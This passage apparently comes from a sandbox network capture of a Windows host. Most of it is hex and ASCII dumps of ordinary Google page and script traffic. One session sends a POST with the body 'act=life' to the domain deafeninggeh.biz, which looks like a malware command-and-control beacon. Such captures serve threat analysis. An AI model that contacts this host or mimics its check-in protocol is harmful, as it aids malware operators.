gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-12-14 22:59:43 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-12-14 22:59:43 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-12-14 22:59:43 UTC	1202	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-12-14 22:59:43 UTC	800	IN	Data Raw: 33 31 39 0d 0a 4d 31 32 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 36 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 36 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c Data Ascii: 319M12,20c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM6,20c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM6,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,
2024-12-14 22:59:43 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 20 67 62 5f 6f 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 68 65 61 64 65 72 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 51 63 20 67 62 5f 4f 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 31 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 42 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c Data Ascii: 8000\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_a gb_od\"\u003e\u003c\/div\u003e\u003c\/header\u003e\u003cdiv class\u003d\"gb_Qc gb_Oc\"\u003e\u003cdiv class\u003d\"gb_1c\"\u003e\u003cdiv class\u003d\"gb_Bc\"\u003e\u003cdiv cl
2024-12-14 22:59:43 UTC	1390	IN	Data Raw: 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 44 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 2e 67 62 5f 49 20 2e 67 62 5f 41 5c 22 29 2c 45 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 23 67 62 2e 67 62 5f 52 63 5c 22 29 3b 44 64 5c 75 30 30 32 36 5c 75 30 30 32 36 21 45 64 5c 75 30 30 32 36 5c 75 30 30 32 36 5f 2e 43 64 28 5f 2e 6c 64 2c 44 64 2c 5c 22 63 6c 69 63 6b 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 5f 2e 46 64 5c 75 30 30 33 64 74 79 70 65 6f 66 20 41 73 79 6e 63 43 6f 6e 74 65 78 74 Data Ascii: tch(e){_._DumpException(e)}\ntry{\nvar Dd\u003ddocument.querySelector(\".gb_I .gb_A\"),Ed\u003ddocument.querySelector(\"#gb.gb_Rc\");Dd\u0026\u0026!Ed\u0026\u0026_.Cd(_.ld,Dd,\"click\");\n}catch(e){_._DumpException(e)}\ntry{\n_.Fd\u003dtypeof AsyncContext
2024-12-14 22:59:43 UTC	1390	IN	Data Raw: 7d 3b 5f 2e 52 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 51 64 28 5f 2e 4d 64 3f 5f 2e 4d 64 2e 65 6d 70 74 79 48 54 4d 4c 3a 5c 22 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 56 64 2c 69 65 2c 55 64 2c 57 64 2c 61 65 3b 5f 2e 53 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 61 3a 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 5f 2e 54 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 29 72 65 74 75 72 6e 20 61 3b 69 66 28 74 79 70 65 6f 66 20 61 5c 75 30 30 33 64 Data Ascii: };_.Rd\u003dnew _.Qd(_.Md?_.Md.emptyHTML:\"\");\n}catch(e){_._DumpException(e)}\ntry{\nvar Vd,ie,Ud,Wd,ae;_.Sd\u003dfunction(a){return a\u003d\u003dnull?a:Number.isFinite(a)?a\|0:void 0};_.Td\u003dfunction(a){if(a\u003d\u003dnull)return a;if(typeof a\u003d
2024-12-14 22:59:43 UTC	1390	IN	Data Raw: 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 5f 2e 75 62 28 61 2c 62 2c 63 2c 21 31 29 21 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 7d 3b 5f 2e 67 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 54 64 28 5f 2e 4c 63 28 61 2c 62 29 29 7d 3b 5f 2e 53 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 53 64 28 5f 2e 4c 63 28 61 2c 62 29 29 7d 3b 5f 2e 54 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 76 62 28 5f 2e 67 65 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 68 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 76 62 28 5f 2e 53 Data Ascii: tion(a,b,c){return _.ub(a,b,c,!1)!\u003d\u003dvoid 0};_.ge\u003dfunction(a,b){return _.Td(_.Lc(a,b))};_.S\u003dfunction(a,b){return _.Sd(_.Lc(a,b))};_.T\u003dfunction(a,b,c\u003d0){return _.vb(_.ge(a,b),c)};_.he\u003dfunction(a,b,c\u003d0){return _.vb(_.S
2024-12-14 22:59:43 UTC	1390	IN	Data Raw: 2c 6e 6f 6e 63 65 3a 5c 22 6e 6f 6e 63 65 5c 22 2c 72 6f 6c 65 3a 5c 22 72 6f 6c 65 5c 22 2c 72 6f 77 73 70 61 6e 3a 5c 22 72 6f 77 53 70 61 6e 5c 22 2c 74 79 70 65 3a 5c 22 74 79 70 65 5c 22 2c 75 73 65 6d 61 70 3a 5c 22 75 73 65 4d 61 70 5c 22 2c 76 61 6c 69 67 6e 3a 5c 22 76 41 6c 69 67 6e 5c 22 2c 77 69 64 74 68 3a 5c 22 77 69 64 74 68 5c 22 7d 3b 5c 6e 5f 2e 71 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 3b 5f 2e 74 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 62 5b 31 5d 2c 64 5c 75 30 30 33 64 5f 2e 72 65 28 61 2c 53 74 72 69 6e 67 28 62 5b 30 5d 29 29 3b 63 5c 75 30 30 32 36 5c 75 30 30 32 Data Ascii: ,nonce:\"nonce\",role:\"role\",rowspan:\"rowSpan\",type:\"type\",usemap:\"useMap\",valign:\"vAlign\",width:\"width\"};\n_.qe\u003dfunction(a){return a?a.defaultView:window};_.te\u003dfunction(a,b){const c\u003db[1],d\u003d_.re(a,String(b[0]));c\u0026\u002

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.4	50090	172.217.19.228	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:42 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-14 22:59:43 UTC	933	IN	HTTP/1.1 200 OK Version: 704583840 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 14 Dec 2024 22:59:43 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-14 22:59:43 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-14 22:59:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.4	50094	104.21.64.1	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:43 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: deafeninggeh.biz
2024-12-14 22:59:43 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 22:59:44 UTC	1012	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mvmatjcug1c80g9khoek2s7qqf; expires=Wed, 09-Apr-2025 16:46:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sg0ibezIQ4gmqNcgllT76Yec03dBTNamnJK57duz%2BezLVVHaHrRSGJEunuXleL5wSb2ZFhQYcPCOONGwxOnsZ9u7K7fU%2FHv5urDPqy%2FL9ppukac%2BXpmxjUVy5stmQs7piTEX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21ce555be542e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1680&min_rtt=1677&rtt_var=635&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1716637&cwnd=239&unsent_bytes=0&cid=52293cb88c5d7008&ts=1011&x=0"
2024-12-14 22:59:44 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 22:59:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.4	50105	142.250.181.46	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:46 UTC	733	OUT	GET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1 Host: apis.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-14 22:59:46 UTC	916	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access" Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]} Content-Length: 117446 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Wed, 11 Dec 2024 22:22:46 GMT Expires: Thu, 11 Dec 2025 22:22:46 GMT Cache-Control: public, max-age=31536000 Last-Modified: Mon, 02 Dec 2024 19:15:50 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Age: 261420 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-14 22:59:46 UTC	474	IN	Data Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 5d 29 3b 0a 76 61 72 20 63 61 2c 64 61 2c 68 61 2c 6d 61 2c 78 61 2c 41 61 2c 42 61 3b 63 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([]);var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var
2024-12-14 22:59:46 UTC	1390	IN	Data Raw: 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 61 22 29 3b 7d 3b Data Ascii: alue;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};
2024-12-14 22:59:46 UTC	1390	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 2c 71 61 3b 69 66 28 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 71 61 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 65 6c 73 65 7b 76 61 72 20 72 61 3b 61 3a 7b 76 61 72 20 73 61 3d 7b 61 3a 21 30 7d 2c 77 61 3d 7b 7d 3b 74 72 79 7b 77 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 73 61 3b 72 61 3d 77 61 2e 61 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 61 29 7b 7d 72 61 3d 21 31 7d 71 61 3d 72 61 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 62 3b 69 66 28 Data Ascii: function(a){var b=function(){};b.prototype=a;return new b},qa;if(typeof Object.setPrototypeOf=="function")qa=Object.setPrototypeOf;else{var ra;a:{var sa={a:!0},wa={};try{wa.__proto__=sa;ra=wa.a;break a}catch(a){}ra=!1}qa=ra?function(a,b){a.__proto__=b;if(
2024-12-14 22:59:46 UTC	1390	IN	Data Raw: 7b 66 6f 72 28 3b 74 68 69 73 2e 46 66 26 26 74 68 69 73 2e 46 66 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 68 3d 74 68 69 73 2e 46 66 3b 74 68 69 73 2e 46 66 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6b 3d 30 3b 6b 3c 68 2e 6c 65 6e 67 74 68 3b 2b 2b 6b 29 7b 76 61 72 20 6c 3d 68 5b 6b 5d 3b 68 5b 6b 5d 3d 6e 75 6c 6c 3b 74 72 79 7b 6c 28 29 7d 63 61 74 63 68 28 6d 29 7b 74 68 69 73 2e 6d 71 28 6d 29 7d 7d 7d 74 68 69 73 2e 46 66 3d 6e 75 6c 6c 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 71 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 7a 50 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 68 3b 0a 7d 29 7d 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 45 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69 Data Ascii: {for(;this.Ff&&this.Ff.length;){var h=this.Ff;this.Ff=[];for(var k=0;k<h.length;++k){var l=h[k];h[k]=null;try{l()}catch(m){this.mq(m)}}}this.Ff=null};b.prototype.mq=function(h){this.zP(function(){throw h;})};var e=function(h){this.Ea=0;this.wf=void 0;thi
2024-12-14 22:59:46 UTC	1390	IN	Data Raw: 68 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 74 79 70 65 6f 66 20 6b 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 68 3d 6e 65 77 20 6b 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 28 68 3d 5f 2e 6c 61 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 2c 68 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 21 31 2c 21 30 2c 68 29 29 3b 68 2e 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 Data Ascii: h("unhandledrejection",{cancelable:!0}):typeof k==="function"?h=new k("unhandledrejection",{cancelable:!0}):(h=_.la.document.createEvent("CustomEvent"),h.initCustomEvent("unhandledrejection",!1,!0,h));h.promise=this;h.reason=this.wf;return l(h)};e.prototy
2024-12-14 22:59:46 UTC	1390	IN	Data Raw: 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 76 61 72 20 43 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 27 74 68 69 73 27 20 76 61 6c 75 65 20 66 6f 72 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 22 29 3b 69 66 28 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78 70 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c Data Ascii: done)})};return e});var Ca=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regul
